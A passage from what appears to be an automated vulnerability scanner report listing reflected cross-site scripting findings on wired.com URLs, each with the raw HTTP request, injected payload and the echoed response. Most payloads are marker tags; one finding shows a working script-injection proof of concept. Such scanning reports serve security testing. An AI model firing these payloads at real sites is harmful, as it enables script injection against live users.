Request

GET /culture/art4d542"><a>e8d21a02e71 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29251
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:24 GMT
Date: Sun, 21 Nov 2010 23:06:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art4d542"><a>e8d21a02e71">
...[SNIP]...

1.45. http://www.wired.com/culture/art/magazine/15-11/pl_arts [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/magazine/15-11/pl_arts

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86153"><a>a16e375242b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture86153"><a>a16e375242b/art/magazine/15-11/pl_arts HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29285
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:10:22 GMT
Date: Sun, 21 Nov 2010 23:06:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture86153"><a>a16e375242b ss_art c_magazine">
...[SNIP]...

1.46. http://www.wired.com/culture/art/magazine/15-11/pl_arts [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/magazine/15-11/pl_arts

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44d77"><a>f26f00f82f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art44d77"><a>f26f00f82f/magazine/15-11/pl_arts HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29283
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:41 GMT
Date: Sun, 21 Nov 2010 23:06:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art44d77"><a>f26f00f82f c_magazine">
...[SNIP]...

1.47. http://www.wired.com/culture/art/magazine/15-11/pl_arts [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/magazine/15-11/pl_arts

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e1d9"><a>1df8fb955e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/magazine8e1d9"><a>1df8fb955e1/15-11/pl_arts HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29285
Vary: Accept-Encoding
Cache-Control: max-age=556
Expires: Sun, 21 Nov 2010 23:16:11 GMT
Date: Sun, 21 Nov 2010 23:06:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_magazine8e1d9"><a>1df8fb955e1">
...[SNIP]...

1.48. http://www.wired.com/culture/art/magazine/16-09/ff_xray [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/magazine/16-09/ff_xray

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c26ce"><a>beebd8a9cd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturec26ce"><a>beebd8a9cd7/art/magazine/16-09/ff_xray HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29285
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:10:22 GMT
Date: Sun, 21 Nov 2010 23:06:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturec26ce"><a>beebd8a9cd7 ss_art c_magazine">
...[SNIP]...

1.49. http://www.wired.com/culture/art/magazine/16-09/ff_xray [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/magazine/16-09/ff_xray

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a6e"><a>642ea85b965 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/artc4a6e"><a>642ea85b965/magazine/16-09/ff_xray HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29285
Vary: Accept-Encoding
Cache-Control: max-age=581
Expires: Sun, 21 Nov 2010 23:16:23 GMT
Date: Sun, 21 Nov 2010 23:06:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_artc4a6e"><a>642ea85b965 c_magazine">
...[SNIP]...

1.50. http://www.wired.com/culture/art/magazine/16-09/ff_xray [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/magazine/16-09/ff_xray

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a844"><a>403dadf803e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/magazine2a844"><a>403dadf803e/16-09/ff_xray HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29285
Vary: Accept-Encoding
Cache-Control: max-age=546
Expires: Sun, 21 Nov 2010 23:16:05 GMT
Date: Sun, 21 Nov 2010 23:06:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_magazine2a844"><a>403dadf803e">
...[SNIP]...

1.51. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/05/gallery_faves_transportation_photos

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72fa5"><a>049ef037e84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture72fa5"><a>049ef037e84/art/multimedia/2008/05/gallery_faves_transportation_photos HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:43 GMT
Date: Sun, 21 Nov 2010 23:06:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture72fa5"><a>049ef037e84 ss_art c_multimedia">
...[SNIP]...

1.52. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/05/gallery_faves_transportation_photos

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f72b"><a>f7633aef4b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art3f72b"><a>f7633aef4b8/multimedia/2008/05/gallery_faves_transportation_photos HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:09 GMT
Date: Sun, 21 Nov 2010 23:07:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art3f72b"><a>f7633aef4b8 c_multimedia">
...[SNIP]...

1.53. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/05/gallery_faves_transportation_photos

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 851a2"><a>7554777a3ab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/multimedia851a2"><a>7554777a3ab/2008/05/gallery_faves_transportation_photos HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:23 GMT
Date: Sun, 21 Nov 2010 23:07:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_multimedia851a2"><a>7554777a3ab">
...[SNIP]...

1.54. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/05/gallery_faves_transportation_photos

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5504f"><script>alert(1)</script>a63a753d0ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/05/gallery_faves_transportation_photos?5504f"><script>alert(1)</script>a63a753d0ce=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:43 GMT
Date: Sun, 21 Nov 2010 23:06:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41600


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/art/multimedia/2008/05/gallery_faves_transportation_photos?5504f"><script>alert(1)</script>a63a753d0ce=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.55. http://www.wired.com/culture/art/multimedia/2008/07/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aacf1"><a>9216975e40b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cultureaacf1"><a>9216975e40b/art/multimedia/2008/07/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29284
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 22:09:17 GMT
Date: Sun, 21 Nov 2010 21:59:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cultureaacf1"><a>9216975e40b ss_art c_multimedia">
...[SNIP]...

1.56. http://www.wired.com/culture/art/multimedia/2008/07/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49165"><a>72a7f1e5436 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art49165"><a>72a7f1e5436/multimedia/2008/07/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29284
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 22:09:35 GMT
Date: Sun, 21 Nov 2010 21:59:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art49165"><a>72a7f1e5436 c_multimedia">
...[SNIP]...

1.57. http://www.wired.com/culture/art/multimedia/2008/07/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bf9a"><a>2dcaf6e058c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/multimedia6bf9a"><a>2dcaf6e058c/2008/07/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29284
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 22:09:48 GMT
Date: Sun, 21 Nov 2010 21:59:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_multimedia6bf9a"><a>2dcaf6e058c">
...[SNIP]...

1.58. http://www.wired.com/culture/art/multimedia/2008/07/TKTKTK [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/TKTKTK

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62137"><a>c291d377b9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture62137"><a>c291d377b9f/art/multimedia/2008/07/TKTKTK HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29290
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:55 GMT
Date: Sun, 21 Nov 2010 23:06:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture62137"><a>c291d377b9f ss_art c_multimedia">
...[SNIP]...

1.59. http://www.wired.com/culture/art/multimedia/2008/07/TKTKTK [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/TKTKTK

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9075"><a>792f200a800 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/artb9075"><a>792f200a800/multimedia/2008/07/TKTKTK HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
